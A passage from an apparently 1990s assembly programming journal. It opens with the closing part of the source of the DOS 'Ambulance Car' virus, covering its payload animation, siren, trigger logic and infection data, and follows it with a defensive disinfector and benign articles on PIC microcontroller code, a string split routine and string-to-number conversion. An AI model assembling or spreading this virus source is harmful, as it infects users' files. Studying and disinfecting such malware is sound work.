; ...x110 (in binary) which happens at: 6, 14, 22, 30, 38, ... 65534. Then,
; when the counter reaches its limit (65535) and goes back to zero, everything
; starts again. So probability of the payload being shown is 1/8 (12.5%) and
; of not is 7/8 (87.5%)
push es
mov ax, word ptr [si+counter-4]
and ax, 00000111b
cmp ax, 00000110b ; Show payload every eight
jne exit_payload ; (starting with the sixth)
; time
; Did we already show the payload? (since the computer was (re)booted)
mov ax, BDA_addr
mov es, ax
mov ax, es:BDA_LPT3_port_addr
or ax, ax ; If the LPT3 port is in use,
jnz exit_payload ; don't show payload
; Mark LPT3 port as in use, so that the payload won't be shown again
inc word ptr es:BDA_LPT3_port_addr
call show_payload
exit_payload:
pop es
retn
payload endp
; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload proc near
; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h
push ds
mov di, 0B800h
mov ax, BDA_addr
mov ds, ax
mov al, ds:BDA_video_mode
cmp al, 7 ; Check which video mode we're
jne setup_video_n_tune ; on, if not Monochrome text
mov di, 0B000h ; mode 7, assume mode 3
setup_video_n_tune:
mov es, di
pop ds
mov bp, 0FFF0h ; Setup number of tones to play
; (will increment up to 50h)
setup_animation:
mov dx, 0 ; Setup ambulance_data column
mov cx, 16 ; Number of characters that make
; up one ambulance_data line
do_ambulance:
call show_ambulance ; Print the ambulance to screen
inc dx
loop do_ambulance
call play_siren ; Play a tone of the 'siren'
call wait_tick ; and wait for a tick
inc bp
cmp bp, 50h ; Already played the 'ambulance
jne setup_animation ; siren' tune 12 times?
call speaker_off ; If yes, then turn speaker off
push ds
pop es
retn
show_payload endp
; Turn the PC speaker off
;------------------------
speaker_off proc near
; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)
in al, 61h
and al, 11111100b ; Disable timer channel 2 and 'ungate'
out 61h, al ; its output to the speaker
retn
speaker_off endp
; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren proc near
; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s) Description
; ------ -----------
; ... 3 2 1 0
; ... x 0 x x Play 1st tone frequency
; ... x 1 x x Play 2nd tone frequency
;
; If we consider A to be the 1st tone and B to be the 2nd tone then the whole
; 'ambulance siren' tune will be: (AAAABBBB) x 12
mov dx, 07D0h ; "ambulance siren" 1st tone frequency
test bp, 00000100b ; Check if we are to play
jz speaker_on ; the first or the second
; tone frequency
mov dx, 0BB8h ; "ambulance siren" 2nd tone frequency
; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s) Description
; ------ -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1 Timer 2 gate to speaker enable
; . . . . . . 1 . Speaker data enable
; x x x x x x . . Other non-concerning fields
speaker_on:
in al, 61h
test al, 00000011b ; If speaker is already on, then go and
jnz play_tone ; play the sound tone
or al, 00000011b ; Else, enable timer channel 2 and
out 61h, al ; 'gate' its output to the speaker
; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s) Description
; ------ -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0 16 binary counter
; . . . . 0 1 1 . Mode 3, square wave generator
; . . 1 1 . . . . Read/Write LSB, followed by write of MSB
; 1 0 . . . . . . Select counter (channel) 2
mov al, 10110110b ; Set 8253 command register
out 43h, al ; for mode 3, channel 2, etc
; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions
play_tone:
mov ax, dx
out 42h, al ; Send LSB (Least Significant Byte)
mov al, ah
out 42h, al ; Send MSB (Most Significant Byte)
retn
play_siren endp
; Show the 'ambulance car'
;-------------------------
show_ambulance proc near
push cx
push dx
lea bx, [si+ambulance_data-4]
add bx, dx ; Setup which ambulance_data column
; were going to print
add dx, bp ; Don't show the ambulance_data columns
or dx, dx ; which aren't still visible
js ambulance_done
cmp dx, 50h ; Check if the column we're printing is
jae ambulance_done ; past the screen limit
; If yes, then the don't print it
mov di, 3200 ; Point to beginning of screen's 64th
; line
add di, dx ; Point to the column we're supposed to
add di, dx ; be printing at
sub dx, bp ; Restore to initial column value
mov cx, 5 ; Set it up so we're in the first line
decode_character:
mov ah, 7 ; Set color attribute to white
; Decode the character
;
; It's really pretty ingenius, each character is encoded in a way, so that for
; each line beyond the first one that character is incremented by one and for
; each column beyond the first the same thing happens. So taken that into
; account it's not difficult to understand how it all works and how to decode
; the ambulance_data
mov al, [bx] ; Get the character
sub al, 7
add al, cl ; Account for which line we're in
sub al, dl ; Account for which column we're in
cmp cx, 5 ; Are we in the first line?
jne print_character ; If we are, then...
mov ah, 15 ; Set color attribute to high-intensity
; white
test bp, 00000011b ; Is this the ending tone of a AAAA or
; BBBB tune sequence?
jz print_character ; If not, then go ahead and print the
; 'siren' characters
mov al, ' ' ; Else, replace them with a ' ' (to
; accomplish the visual 'siren' effect
print_character:
stosw ; Print the character to screen
add bx, 16 ; Point to next ambulance_data line
add di, 158 ; Point to next screen line
loop decode_character
ambulance_done:
pop dx
pop cx
retn
show_ambulance endp
; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick proc near
push ds
mov ax, BDA_addr
mov ds, ax
mov ax, ds:BDA_timer_counter ; Get ticks since midnight
check_timer:
cmp ax, ds:BDA_timer_counter ; Check if one tick has
je check_timer ; already passed
pop ds
retn
wait_tick endp
;--- Data from here below
ambulance_data:
first_line db 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
db 2Dh, 2Eh, 2Fh, 30h, 31h
second_line db 23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
db 0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
third_line db 24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
db 0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
fourth_line db 25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
db 0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
fifth_line db 26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
db 0EFh, 0F0h, 32h, 62h, 34h, 0F4h
; Here's how the ambulance looks - see under DOS (box):
;
; \|/
; ÜÜÜÜÜÜÜÜÛÜÜÜ
; ÛÛÛÛß ßÛÛÛ \
; ÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛ
; ßß OO ßßßßß O ß
counter dw 9
jump_code:
near_jump db 0E9h
relative_offset db 36h, 00h
first_3bytes db 3 dup (?)
file_handle dw ?
virus_body:
original_3bytes db 0CDh, 20h ; 'int 20h' opcode
db 90h ; 'nop' opcode
;--- Stuff that gets saved along with the virus ends here
six_bytes db 6 dup (?)
filename_ptr dw ?
DTA_seg dw ?
DTA_off dw ?
file_mask:
filename:
pathname db 6 dup (?)
db 7 dup (?)
db 67 dup (?)
new_DTA:
reserv db 21 dup (?)
f_attr db ?
f_time dw ?
f_date dw ?
f_size dd ?
f_name db 13 dup (?)
filler db 85 dup (?)
_TEXT ends
end ambulance_car
---------------------------------------------------------------------------8<--
Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
'Ambulance Car' Disinfector
by Chili
Since I provided a ready-to-be-assembled virus in the "'Ambulance Car'
Disassembly" article, I decided to also write a bonus article with a basic
disinfector for it. Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains, though it does work on more than half of
the strains I have (thanks Cicatrix). It is only intended to work with the
strain I provided, so no assurances are given as to whether it will do the job
or not with other strains (it also works with the 'RedXAny' strain look-alike
and with the tamed version that only displays the payload - this tamed version
really isn't a virus since it doesn't replicate and so F-PROT won't report it;
the disinfector does report and clean it though).
An infected file can easily be cleaned by hand, so you should try that first.
The disinfector will scan all .COM files in the current directory for three
things: 1. the '0E9h' near jump code (other strains may have the '0EBh' jump
code - this won't detect them!); 2. the delta offset calculation routine
pointed to by the near jump; 3. the ambulance data at the end of the virus (if
you change this into something else the disinfector will report this file as
suspicious). Upon a suspicious or infected file report the user will be given a
chance to clean it or continue on to the next file.
And here is the disinfector:
[NOTE: F-PROT will report this as a new or modified variant of SillyC - go
figure!]
--8<---------------------------------------------------------------------------
; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
; tasm /ml /m2 killredx.asm
; tlink /t killredx.obj
LF equ 0Ah ; 'Line Feed' ASCII code
CR equ 0Dh ; 'Carriage Return' ASCII code
_TEXT segment word public 'code'
assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT
org 100h
killredx proc far
;--- Print program identification message
lea si, killredx_msg
call print_ASCIIZ
;--- Find first .COM file
lea dx, com_mask
xor cx, cx
mov ah, 4Eh
int 21h
jnc open_file
jmp exit
open_file:
;--- Print found file's name
lea si, newline_msg
call print_ASCIIZ
mov si, 9Eh
call print_ASCIIZ
;--- Open found file
mov dx, 9Eh
mov ax, 3D02h
int 21h
jnc read_jump
;--- Print open error message
lea si, open_msg
call print_ASCIIZ
jmp find_next
read_jump:
;--- Read jump code
xchg ax, bx
mov cx, 3
lea dx, jump_code
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_jump
jmp close_file
check_jump:
;--- Compare with known virus' jump code
cmp byte ptr [jump_code], 0E9h
je read_displacement
jmp close_file
read_displacement:
;--- Move file pointer to jump offset
mov dx, word ptr [jump_code+1]
add dx, 3
xor cx, cx
mov ax, 4200h
int 21h
;--- Read displacement calculation code
mov cx, 7
lea dx, displace_code
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_displacement
jmp close_file
check_displacement:
;--- Compare with known virus' displacement calculation code
cmp word ptr [displace_code], 01E8h
jne exit_check
cmp word ptr [displace_code+2], 0100h
jne exit_check
cmp word ptr [displace_code+4], 815Eh
jne exit_check
cmp byte ptr [displace_code+6], 0EEh
jne exit_check
jmp read_data
exit_check:
jmp close_file
read_data:
;--- Move file pointer to supposed data location
mov cx, 0FFFFh
mov dx, 0FFF1h
mov ax, 4202h
int 21h
;--- Read ambulance data
mov cx, 2
lea dx, ambulance_data
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je check_data
jmp close_file
read_error:
;--- Print read error message
lea si, read_msg
call print_ASCIIZ
jmp close_file
check_data:
;--- Compare with know virus' ambulance data
cmp word ptr [ambulance_data], 0F434h
jne suspicious
;--- Print file infected or suspicious message
lea si, infected_msg
jmp askto_clean
suspicious:
lea si, suspicious_msg
askto_clean:
;--- Print and read answer to whether clean file or not
call print_ASCIIZ
mov ah, 08h
int 21h
cmp al, 'y'
je clean_file
cmp al, 'Y'
je clean_file
jmp close_file
clean_file:
;--- Move file pointer to supposed original bytes location
mov cx, 0FFFFh
mov dx, 0FFFDh
mov ax, 4202h
int 21h
;--- Read host's original (first 3) bytes
mov cx, 3
lea dx, original_bytes
mov ah, 3Fh
int 21h
jc read_error
cmp ax, cx
je write_original
jmp close_file
write_original:
;--- Move file pointer to beginning of file
xor cx, cx
xor dx, dx
mov ax, 4200h
int 21h
;--- Write original bytes
mov cx, 3
lea dx, original_bytes
mov ah, 40h
int 21h
jc write_error
cmp ax, cx
je truncate_file
write_error:
;--- Print write error message
lea si, write_msg
call print_ASCIIZ
jmp close_file
truncate_file:
;--- Move file pointer to virus' jump offset (real virus start)
mov dx, word ptr [jump_code+1]
add dx, 3
xor cx, cx
mov ax, 4200h
int 21h
;--- Truncate file
mov cx, 0
mov ah, 40h
int 21h
jc write_error
cmp ax, cx
jne write_error
lea si, disinfected_msg
call print_ASCIIZ
close_file:
;--- Close file
mov ah, 3Eh
int 21h
find_next:
;--- Find next matching file
mov ah, 4Fh
int 21h
jc exit
jmp open_file
exit:
;--- Exit to DOS
lea si, newline_msg
call print_ASCIIZ
retn
killredx endp
print_ASCIIZ proc near
;--- Print an ASCIIZ string
lodsb
cmp al, 0
je end_ASCIIZ
xchg al, dl
mov ah, 02h
int 21h
jmp print_ASCIIZ
end_ASCIIZ:
retn
print_ASCIIZ endp
killredx_msg db "'Ambulance Car' Disinfector", LF, CR
db "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg db LF, CR, 0
infected_msg db " Infected. Clean [y/n]?", 0
suspicious_msg db " Suspicious. Attempt to cleanû (û WARNING: file may "
db "be corrupted if infected by an unknown/unsupported "
db "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db LF, CR, " Disinfected.", 0
open_msg db LF, CR, " [ERROR: opening file]", 0
read_msg db LF, CR, " [ERROR: reading from file]", 0
write_msg db LF, CR, " [ERROR: writing to file]", 0
com_mask db "*.COM", 0
jump_code db 3 dup (?)
displace_code db 7 dup (?)
ambulance_data dw ?
original_bytes db 3 dup (?)
_TEXT ends
end killredx
---------------------------------------------------------------------------8<--
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Assembling for PIC's
Jan Verhoeven
Below is a piece of assembly language for the MicroChip PIC processor. This
particular program will flash some LED's and activate some relays based on the
status of some control-inputs. The target MCU was the PIC 16C54, one of the
most simple chips in that range.
To give some indication of what we're upto:
RAM 25 bytes
ROM 512 words (of 12 bits each)
I/O 12 bits
Clockspeed 8 kHz (this project, max = 4 MHz)
Instructions 33
On-Chip-Stack 2 levels
Compare this to a modern PC clone....
RISC and Harvard architecture.
------------------------------
The PIC line of MCU's are RISC chips, so they use the Harvard architecture,
and one of the results is that they have different code- and data-memories.
Higher PIC's have more features, like INTerrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdogtimer (WDT) which
needs to be reset regularly (if enabled) else the MCU will reset itself.
The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmer's but
programming resembles that of the Hewlett Packard HP 11 range of calculators.
Here is an overview of the registerset. Microchip refers to this as the
"register file".
file address name comment
------------ -------------- --------------------
00 indirect calls not a real register!
01 RTCC timer counter
02 PC (or IP) lower 8 bits of it
03 STATUS flags register
04 FSR bank select of PIC 16C57
05 Port A has 4 I/O lines
06 Port B has 8 I/O lines
07 Port C 8 I/O, only 16C55 and 16C57
GP register on 'C54 and 'C56
08 GP register General purpose register
.. .. ..
1F GP register General purpose register
Besides these "transparant registers" there are also some hidden registers
(which also are write only...) for processor control. These are:
TRISA The "tristate A/B/C" registers determine the status
TRISB of each pin of the I/O ports.
TRISC A "1" makes it "input" and a "0" makes it an output.
OPTION is for controlling the WDT and the RTCC
And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"). This can only be done with the W-file. It takes
some getting used to, but the concept is simple and straightforward and
eventually you will get used to it and learn to appreciate it.
From that moment on, you will only have to get used to the fact that data is
nbot always ending up where you would like to have it. All instructions
between W and F (any register or file) end with a "d" option. If "d" is a "1",
the destination is the file F, if "d" is "0", the result will be stored in the
W file...
This took me some time to get used to and still is the main source of errors.
Apart from having selected the wrong osciallator and not disabling the WDT....
The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:
mnemonic description
---------------- -----------------------------------------
ADDWF F, d d := W + F
ANDLW k W := W AND k
ANDWF F, d d := W AND F
BCF F, b bit b in F is cleared (i.e. made zero)
BSF F, b bit b in F is set (i.e. made one)
BTFSC F, b if bit b in F is CLEAR, skip next instruction
BTFSS F, b if bit b in F is SET, skip next instruction
CALL k push PC, PC := k
CLRF F Clear file F
CLRW Clear file W
CLRWDT Clear Watchdogtimer
COMF F F := NOT F (1's complement)
DECF F, d d := F - 1
DECFSZ F, d d := F - 1; If 0 => skip next instruction
GOTO k PC = k
INCF F, d d := F + 1
INCFSZ F, d d := F + 1; If 0 => skip next instruction
IORLW k W := W OR k
IORWF F, d d := W OR F
MOVF F, d d := F (zero flag affected)
MOVLW k W := k
MOVWF F F := W
NOP No operation
OPTION OPTION := W
RETLW k W := k, pop PC
RLF F, d d := rotate left through carry (F)
RRF F, d d := rotate right through carry (F)
SLEEP enter powerdown mode
SUBWF F, d d := F - W (2's complement)
SWAPF F, d d := swap-nibbles (F)
TRIS F TRIState information for I/O pins
XORLW k W := W XOR k
XORWF F, d d := W XOR F
Especially the "F, d" construct takes some getting used to.
Below is the source for the "LEGO controller":
--------------------------------------------------------------------------
title "LEGO 003"
subtitl "control LEGO technic devices"
LIST P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54 equ 1FFH ; Define Reset Vectors
RTCC equ 1h ; define register designators
PC equ 2h ; the program counter is a register as well
STATUS equ 3h ; F3 Reg is STATUS Reg.
PORT_A equ 5h
PORT_B equ 6h ; I/O Port Assignments
RTCC_tc equ 0Dh ; time constant for RTCC
count_1 equ 0Eh ; delay counters and GP registers
count_2 equ 0Fh
file equ 1
w equ 0
flag_0 equ 0 ; input bits in RA port
flag_1 equ 1
flag_2 equ 2
flag_3 equ 3
LED_0 equ 0 ; status led 1, in RB Port
LED_1 equ 1 ; status led 2
RL_1 equ 2 ; relays 1 - 3
RL_2 equ 3
RL_3 equ 4
s_clk equ 5 ; s_clk input
s_data equ 6 ; s_data input
go equ 7
delay movlw .100 ; mov W with 100 decimal
movwf count_1 ; xfer W to register
dela_1 clrf count_2 ; count_2 = 0
dela_2 decfsz count_2, file ; count_2 = count_2 - 1
goto dela_2 ; skip this instruction if count_2 = 0, ...
decfsz count_1, file ; ... ending here: count_1 = count_1 - 1
goto dela_1 ; skip this instruction when count_1 = 0
retlw 0 ; ending here, if so.
flash bcf PORT_B, LED_1 ; flash LED's 0 and 1 as an acknowledgement
bsf PORT_B, LED_0 ; activate the LED's.
call delay ; wait a while
bcf PORT_B, LED_0 ; toggle the LED's
bsf PORT_B, LED_1
call delay ; wait a second!
bcf PORT_B, LED_1 ; turn LED_1 off as well.
retlw 0 ; return to caller with W = 0
RT_chk clrwdt ; clear the watchdog timer
btfsc RTCC, 7 ; RELAY_3 follows bit7 of RTCC
bcf PORT_B, RL_3
btfss RTCC, 7
bsf PORT_B, RL_3
movf RTCC, w
skpz ; internal macro for BTFSS STATUS, 2
retlw 0
movf RTCC_tc, w ; if
movwf RTCC
retlw 0
start clrf RTCC
clrf RTCC_tc ; clear RTCC and RTCC time constant
movlw B'00001111'
tris PORT_A ; define port A as inputs
movlw B'11100000'
tris PORT_B ; define port B as I/O
movlw B'00110111'
option ; define state of WDT, RTCC and prescaler
movlw B'00011100'
movwf PORT_B ; initialize port B
call flash ; signal READY
call flash
btfss PORT_B, s_clk ; if s_clkline low, check for mode 2 request
goto m_chk
repeat clrwdt ; clear watchdog timer
call flash
movf PORT_A, w ; read port A into W
andlw 3 ; mask off sensor inputs
skpnz ; skip next instruction if NonZero
goto set_tc ; flag_0 and _1 zero => define RTCC time
constant
btfsc PORT_A, flag_0
goto t_left
btfsc PORT_A, flag_1
goto t_right
movf PORT_B, w
andlw s_clk + s_data + go
skpnz ; if no RESET condition, skip
goto start
call RT_chk
goto repeat
t_left btfsc PORT_A, flag_2 ; if in end position, do not turn at all
goto l_exit
bcf PORT_B, RL_1 ; else set direction for Turn Left
bsf PORT_B, RL_2
bsf PORT_B, LED_0 ; show direction with LED's
bcf PORT_B, LED_1
chk_fl2 btfsc PORT_A, flag_2 ; wait until home-position is reached
goto l_exit ; if so, get out
call RT_chk ; if not, check again
goto chk_fl2 ; until done
l_exit bsf PORT_B, RL_1 ; release relay 1
bcf PORT_B, LED_0 ; extinguish light 0
goto repeat ; jump back
t_right btfsc PORT_A, flag_3 ; if in end position, do not turn at all
goto r_exit
bcf PORT_B, RL_2 ; else set direction for Turn Right
bsf PORT_B, RL_1
bsf PORT_B, LED_1 ; show direction with LED's
bcf PORT_B, LED_0
chk_fl3 btfsc PORT_A, flag_3 ; wait until home position reached
goto r_exit
call RT_chk
goto chk_fl3
r_exit bsf PORT_B, RL_2 ; deactivate lights and relays
bcf PORT_B, LED_1
goto repeat
m_chk clrf count_1 ; check inputs and make sure there's no glitch
clrf count_2
m_chk_1 btfss PORT_B, s_clk
decf count_1, file ; count pulses s_clkline = low
decfsz count_2, file
goto m_chk_1
movf count_1, w ; w = low-pulses
subwf count_2, w ; if count_1 <> count_2, glitch occurred
skpz
goto start
set_tc movf RTCC, w ; move current value of RTCC
movwf RTCC_tc ; to time constant register
goto repeat
org PIC54 ; goto highest word in code space
goto start ; and place the reset vector.
end
--------------------------------------------------------------------------
If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:
condition action by PIC
--------- -----------------------------------
FALSE execute next instruction
TRUE replace next instruction with a NOP
This enables the programmer to make 100% accurate timingloops since there is
no difference between a FALSE and a TRUE condition.
The size of this piece of code is easy to calculate: each line with an
mnemonic is one instructionword. This makes 115 words from the 512 word
program memoryspace, so we have nearly 400 instructionwords wasted.
The PIC's are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more of this kind of CPU's, visit the website at
http://www.microchip.com
for PDF datasheets and more. Scenix also has a range of clones out, right now.
They are software compatible but offer more hardware features. Which is not
difficult since the codeword in the design of the PIC's seemed to have been
KISS.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Splitting Strings
by mammon_
Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:
($field1, $field2, $junk) = split(':', $line);
@array = split(' ', $line);
In the first line, the source string is split into a maximum of 3 substrings,
creating a new string each time it encounters a colon character; note that the
third string, $junk, contains the entire rest of the string -- only the first 2
colons will be parsed. In the second line, an array of strings is created by
splitting the source string at the space character; since the number of destin-
ation strings is not specified, the array will contain one element for each
substring [read: each string created by splitting the original at a whitespace
character].
Strings and string parsing are notably tedious in assembly. Once learning Perl,
I found that the pseudocode for many of my asm programs started to include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.
Being that asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. Since the most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:
mov ecx, ptrArray
push dword ptrString
push dword [delimiter]
call split
mov [ecx], eax
.loop:
call split
cmp eax, 0
je .end
mov [ecx], eax
add ecx, 4
jmp .loop
.end:
This allows for control over the number of substrings created by only calling
split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.
Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:
push dword ptrString
push dword [delimiter]
call split
mov [ptrStringArray], eax
This is obviously more elegant on the caller side, but it has a few subtle
problems: first, the control over how many elements is split is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find the end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.
The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:
push dword ptrString
push dword [delimiter]
call split
mov [ptrStringArray], eax
mov [StringArrayNum], ebx
The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.
The complete split routine is as follows:
#--------------------------------------------------------------------split.asm
; split( char, string, max_split)
; Returns address of array of pointers into original string in eax
; Returns number of array elements in ebx
; Behavior:
; split( ":", "this:that:theother:null\0", NULL)
; "this\0that\0theother\0null\0"
; ptrArray[0] = [ptrArray+0] = "this\0"
; ptrArray[1] = [ptrArray+4] = "that\0"
; ptrArray[2] = [ptrArray+8] = "theother\0"
; ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free
split:
push ebp
mov ebp, esp ;save stack pointer
mov ecx, [ebp + 8] ;max# of splits
mov edi, [ebp + 12] ;pointer to target string
mov ebx, [ebp + 16] ;splitchar
xor eax, eax ;zero out eax for later
mov edx, esp ;save current stack pos.
push dword edi ;save ptr to first substring
cmp ecx, 0 ;is #splits NULL?
jnz do_split ;--no, start splitting
mov ecx, 0xFFFF ;--yes, set to MAX
do_split:
mov bh, byte [edi] ;get byte from target string
cmp bl, bh ;equal to delimiter?
je .splitstr ;--yes, then split it
cmp al, bh ;end of string? [al == 0x0]
je EOS ;--yes, then leave split()
inc edi ;next char
loop do_split
.splitstr:
mov [edi], byte al ;replace split delimiter with "\0"
inc edi ;move to first char after delimiter
push edi ;save ptr to next substring
loop do_split ;loop #splits or till EOS
EOS:
mov ecx, edx ;edx, ecx == original stack position
sub ecx, esp ;get total size of pushed pointers
push ecx ;save size
call malloc ;allocate that much space for array
test eax, eax
jz .error
pop ecx ;restore size
mov edi, eax ;set destination to beginning of array
add edi, ecx ;move to end of array
shr ecx, 2 ;divide total size/4 [= # of dwords to move]
mov ebx, ecx ;save count
.store:
sub edi, 4 ;move to beginning of dword
pop dword [edi] ;pop from stack to array
loop .store
.error:
mov esp, ebp
pop ebp
ret ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF
The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, the a pointer to the character after the delimiter
is pushed onto the stack:
this:that:theother\0
^----------------------This is pushed at the very beginning.
Element#: array[0]
this:that:theother\0
^-----------------This is pushed when the first ':' is found.
Element#: array[1]
this\0that:theother\0
^-----------This is pushed when the second ':' is found
Element#: array[2]
this\0that\0theother\0
The stack now looks like this:
--------------[ebp]
ptr->string1
ptr->string2
ptr->string3
--------------[esp]
The string pointers are then POPed into the
array, starting with array[2] and ending with
array[0].
Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi is set to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.
To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:
#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'
SECTION .text
main:
push dword szString ;print the original string
push dword szOutput
call printf
add esp, 8
push dword ":" ;split the original string
push dword szString
push dword 0
call split
add esp, 12
mov ecx, ebx
mov ebx, eax
printarray: ;print the substrings
push ecx ;printf hoses ecx!!!!!
push dword [ds:ebx]
push dword szOutput
call printf
add esp, 8
add ebx, 4 ;skip to next array element
pop ecx
loop printarray
push dword [ptrarray] ;free the array created by split
call free
add esp, 4
push dword 0 ;program is done
call exit
SECTION .data
szOutput db '%s',0Ah,0Dh,0 ;printf format string
szString db 'name:password:UID:GID:group:home',0 ;string to print
#------------------------------------------------------------------------EOF
This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable --the only assumed external routine
is malloc() and -- and can easily be rewritten for the DOS or win32 platforms.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
String to Numeric Conversion
by Laura Fairhead
Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.
The routine will scan values in any radix from 0 to 36. Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".
With this routine there are 2 API's 'scanur' and 'scanu'. 'scanur'
is used to set the radix of the scan conversion. Once this value is
set the main routine 'scanu' can be called freely to scan values from
the string.
The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear, there is no error, however now the zero flag
indicates if a valid value was actually scanned. This return status
convention gives the most flexibility to the application programmer,
also if a valid value MUST be scanned they can detect the condition
via:-
CALL NEAR PTR scanu
JNA error ;get out if overflow/no value
The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.
=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
DB ?
;
;scanur- set up for scanu routine
;
;entry: AL=radix
;
; !! radix must be in range 0<=radix<=36
;
; !! radix must be set by calling this routine prior to
; !! using scanu
;
;exit: (all registers preserved)
;
scanur PROC NEAR
MOV BYTE PTR CS:[scanuradi],AL
RET
scanur ENDP
;
;scanu- scan string value returning result
;
;entry: DS:SI=address of string
; DF=0
;
; !! radix must be set previously by calling 'scanur'
;
;exit: SI=updated to offset of first invalid character
;
; CF=1
